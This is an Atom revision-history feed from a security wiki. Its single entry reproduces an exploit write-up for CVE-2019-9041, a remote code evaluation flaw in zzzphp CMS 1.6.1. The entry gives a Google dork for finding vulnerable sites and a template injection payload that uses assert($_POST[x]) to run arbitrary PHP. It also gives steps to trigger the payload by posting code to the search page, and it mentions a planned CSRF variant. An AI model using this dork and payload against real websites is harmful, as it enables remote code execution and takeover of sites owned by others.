<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-9041_zzzphp_CMS_1.6.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2019-9041 zzzphp CMS 1.6.1 遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-9041_zzzphp_CMS_1.6.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-9041_zzzphp_CMS_1.6.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-08T06:43:50Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-9041_zzzphp_CMS_1.6.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2031&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1  # Google Dork: intext:&quot;2015-2019 zzcms.com&quot;  # Date: 24/02/2019  # Exploit Author: Yang Chenglong...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-9041_zzzphp_CMS_1.6.1_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2031&amp;oldid=prev"/>
		<updated>2021-05-02T04:57:00Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1  # Google Dork: intext:&amp;quot;2015-2019 zzcms.com&amp;quot;  # Date: 24/02/2019  # Exploit Author: Yang Chenglong...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1&lt;br /&gt;
&lt;br /&gt;
# Google Dork: intext:&amp;quot;2015-2019 zzcms.com&amp;quot;&lt;br /&gt;
&lt;br /&gt;
# Date: 24/02/2019&lt;br /&gt;
&lt;br /&gt;
# Exploit Author: Yang Chenglong&lt;br /&gt;
&lt;br /&gt;
# Vendor Homepage: http://www.zzzcms.com/index.html&lt;br /&gt;
&lt;br /&gt;
# Software Link: http://115.29.55.18/zzzphp.zip&lt;br /&gt;
&lt;br /&gt;
# Version: 1.6.1&lt;br /&gt;
&lt;br /&gt;
# Tested on: windows/Linux,iis/apache&lt;br /&gt;
&lt;br /&gt;
# CVE : CVE-2019-9041&lt;br /&gt;
&lt;br /&gt;
Due to the failure of filtering function parserIfLabel() in inc/zzz_template.php, attackers can insert dynamic php code into the template file and leads to dynamic code evaluation.&lt;br /&gt;
&lt;br /&gt;
Exploit:&lt;br /&gt;
login in to the admin panel, edit the template of search.html, insert the following code:&lt;br /&gt;
&lt;br /&gt;
{if:assert($_POST[x])}phpinfo();{end if}&lt;br /&gt;
&lt;br /&gt;
Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute the php code “phpinfo()” as follow:&lt;br /&gt;
[1.png]&lt;br /&gt;
&lt;br /&gt;
Remarks:&lt;br /&gt;
While the above exploit requires attackers to have the access to the admin panel, I will post another exploit by using csrf to acquire the control of website without access to the admin panel.&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>